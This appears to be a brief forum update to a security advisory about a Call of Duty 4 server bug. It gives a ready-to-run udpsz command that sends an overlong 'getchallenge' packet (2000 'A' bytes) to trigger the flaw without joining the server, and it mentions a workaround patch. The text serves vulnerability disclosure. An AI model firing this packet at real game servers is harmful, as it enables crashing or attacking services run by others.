just an update to the advisory I released 2 years ago.
indeed for exploiting this bug is not needed to join the server, it's enough a getchallenge packet with a long hash like the following example:
yyyygetchallenge 0 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...1024...aaa
so:
Code:
udpsz -C ffffffff6765746368616c6c656e6765203020 -b A SERVER PORT 2000
obviously if the server uses my cod4vawo.lpatch work-around it's immune.
for the additional info about the bug I remember my advisory:
http://aluigi.org/adv/cod4vamap-adv.txt